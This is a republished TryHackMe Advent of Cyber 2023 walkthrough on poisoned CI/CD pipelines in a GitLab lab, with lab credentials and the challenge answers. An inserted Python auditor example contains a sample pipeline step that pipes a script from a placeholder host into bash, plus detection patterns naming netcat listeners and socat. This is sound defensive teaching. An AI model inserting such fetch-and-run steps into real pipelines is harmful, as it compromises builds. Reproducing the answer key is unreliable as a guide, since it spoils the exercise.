Advent of Cyber 2023 — Day 20 Writeup with Answers by Karthikeyan Nagaraj | TryHackMe Walkthrough
2024-1-14 19:24:31 Author: infosecwriteups.com (view original) Views: 11

TryHackMe — DevSecOps Purple [ Advent of Frostlings ] — Someone is attacking the gift-giving pipeline by pushing malicious code and messing with the build process

Karthikeyan Nagaraj

InfoSec Write-ups


  1. Scenario
  2. Learning Objectives
  3. Understanding Concepts
  4. Pre-Requisites
  5. Challenge Tasks — Answers
  6. Video PoC — https://youtu.be/8q7nFmxWDbM

One of the main reasons the Best Festival Company acquired AntarctiCrafts was their excellent automation for building, wrapping, and crafting. Their new automation pipelines make it a much easier, faster, scalable, and effective process. However, someone has tampered with the source control system, and something weird is happening! It’s suspected that McGreedy has impersonated some accounts or teamed up with rogue Frostlings. Who knows what will happen if a malicious user gains access to the pipeline?

  • ’Tis the season of giving, but the Frostlings have invaded the AntarctiCrafts GitLab CI/CD pipeline.
  • They have found a way to poison the pipeline, orchestrating the Advent Calendar build process for this holiday season.
  • Your mission as a DevSecOps engineer is to uncover and mitigate this attack to ensure the calendar doesn’t suffer from any malicious alterations.
  • Learn about poisoned pipeline execution.
  • Understand how to secure CI/CD pipelines.
  • Get an introduction to secure software development lifecycles (SSDLC) & DevSecOps.
  • Learn about CI/CD best practices.

GitLab and SDLC Concepts

GitLab is a platform that enables collaboration and automation throughout the software development lifecycle, which is the framework structure that describes the stages that code goes through, from design and development to deployment. GitLab is built around Git, a distributed version control system (VCS) where code is managed.

Here are the key components of GitLab:

  • Version control system: A VCS is the environment where you manage and track changes made in the codebase. It makes it easier to collaborate with others and maintain the history and versioning of a project.
  • CI/CD pipelines: Pipelines automate the building, testing, and deployment processes. Pipelines ensure the code is consistently integrated, tested, and delivered to the specified environment (production or staging).
  • Security scanning: GitLab has a few scanning features, like incorporating static application security testing (SAST), dynamic application security testing (DAST), container scanning, and dependency scanning. All these tools help identify and mitigate security threats in code and infrastructure.

CI/CD

We mentioned CI/CD earlier in the context of pipelines. CI/CD stands for continuous integration and continuous delivery.

  • Continuous integration: CI refers to integrating code changes from multiple contributors into a shared repository (where code is stored in a VCS; you can think of it as a folder structure). In GitLab, CI allows developers and engineers to commit code frequently, triggering automations that lead to builds and tests. This is what CI is all about: ensuring that code changes and updates are continuously validated, which reduces the likelihood of vulnerabilities when introducing security scans and tests as part of the validation process (here, we start entering the remit of DevSecOps).
  • Continuous deployment: CD automates code deployment to different environments. During SDLC, code travels to environments like sandbox and staging, where the tests and validations are performed before they go into the production environment. The production environment is where the final version of an app or service lives, which is what we, as users, tend to see. CD pipelines ensure the code is securely deployed consistently and as part of DevSecOps. Integrating security checks before deployment to production is key.

DevSecOps

We have mentioned that integrating security into CI/CD ensures consistency and threat reduction when integrating it into the SDLC. This is what DevSecOps aims to achieve. Everything we have seen so far is part of a cultural and technical approach that aims to improve collaboration, automation, and CI/CD. It’s what we call developer operations, or DevOps for short. DevSecOps was born from DevOps and is an extension specialising in security for DevOps practices.

CI/CD Attacks: PPE

In today’s AoC, you will learn about poisoned pipeline execution. This type of attack involves compromising a component or stage in the SDLC. For this attack to work, it takes advantage of the trust boundaries established within the supply chain, which is extremely common in CI/CD, where automation is everywhere.

When an attacker has access to version control systems and can manipulate the build process by injecting malicious code into the pipeline, they don’t need access to the build environment. This is where the “poisoned” pipelines come into play. It’s crucial to have effective, secure gates and guardrails to prevent malicious code from getting far if there is an account compromise.
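The PPE scenario above and the .gitlab-ci.yml inspection in task 2 below both come down to reviewing what the pipeline file tells the runner to execute. The following is an added example, not code from the room or from the writeup: it scans a constructed `.gitlab-ci.yml` (not the real challenge file; the hostname and the altered deploy job are made up) for the kinds of script changes a poisoned pipeline relies on, such as a job piping a downloaded script into a shell or starting an ad-hoc web server on an unexpected port.

```python
import re

# Constructed sample .gitlab-ci.yml (not the room's real file). The deploy job has
# been altered: it fetches and runs a remote script and serves the site on port 9081.
SAMPLE_CI = """\
stages:
  - build
  - deploy
build:
  stage: build
  script:
    - echo "Building the Advent Calendar"
deploy:
  stage: deploy
  script:
    - curl -s http://example.invalid/setup.sh | bash
    - python3 -m http.server 9081
"""

# Script-line patterns that should never land in a pipeline without review.
RISKY_PATTERNS = {
    "remote-script-exec": re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
    "ad-hoc-listener": re.compile(r"http\.server|\bnc\s+-l|\bsocat\b"),
}
# Top-level GitLab CI keywords that are not jobs.
RESERVED = {"stages", "variables", "default", "include", "workflow", "image", "services"}

def parse_jobs(text):
    """Map job name -> script lines. Line-based, assumes two-space indentation; not a full YAML parser."""
    jobs, current, in_script = {}, None, False
    for line in text.splitlines():
        if line and not line.startswith(" ") and line.rstrip().endswith(":"):
            current, in_script = line.rstrip()[:-1], False
            if current not in RESERVED:
                jobs[current] = []
        elif current in jobs and line.strip() == "script:":
            in_script = True
        elif current in jobs and in_script and line.startswith("    - "):
            jobs[current].append(line.strip()[2:])
        elif current in jobs and line.startswith("  ") and not line.startswith("    "):
            in_script = False  # another job-level key ends the script block
    return jobs

def audit(text):
    """Return (job, finding, command) triples for every risky script line."""
    findings = []
    for job, script in parse_jobs(text).items():
        for cmd in script:
            findings += [(job, name, cmd) for name, pat in RISKY_PATTERNS.items() if pat.search(cmd)]
    return findings
```

Run `audit()` over the pipeline file at each merge request and fail the review when it returns anything; protected branches and required approvals then keep an impersonated account from merging such a change unchallenged.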

Pre-Requisites

  1. Start the TryHackMe VPN or start the AttackBox
  2. Open the machine URL in a new tab
  3. Log in with the credentials DelfSecOps:TryHackMe!
  4. If you receive an error after logging in, click the home button
  5. Then click on Advent Calendar BFC

1. What is the handle of the developer responsible for the merge changes?

Click on the username Frostlino and you will see the handle.

Ans: @badsecops

2. What port is the defaced calendar site server running on?

Open and check the pipeline configuration file .gitlab-ci.yml.

Ans: 9081

3. What server is the malicious server running on?

Ans: Apache

4. What message did the Frostlings leave on the defaced site?

Open your TryHackMe machine IP on port 9081 in a new tab (IP:9081).

Ans: FROSTLINGS RULE

5. What is the commit ID of the original code for the Advent Calendar site?

  1. Click on History, scroll down to the bottom, and you will see the commit that was made.
  2. Click on it and you will see the commit ID.

Ans: Use your skills and try to find this answer.

If you are unable to do so, use the video PoC linked above to find the answer.


Source: https://infosecwriteups.com/advent-of-cyber-2023-day-20-writeup-with-answers-by-karthikeyan-nagaraj-tryhackme-walkthrough-79eeb2b05659?source=rss----7b722bfd1b8d---4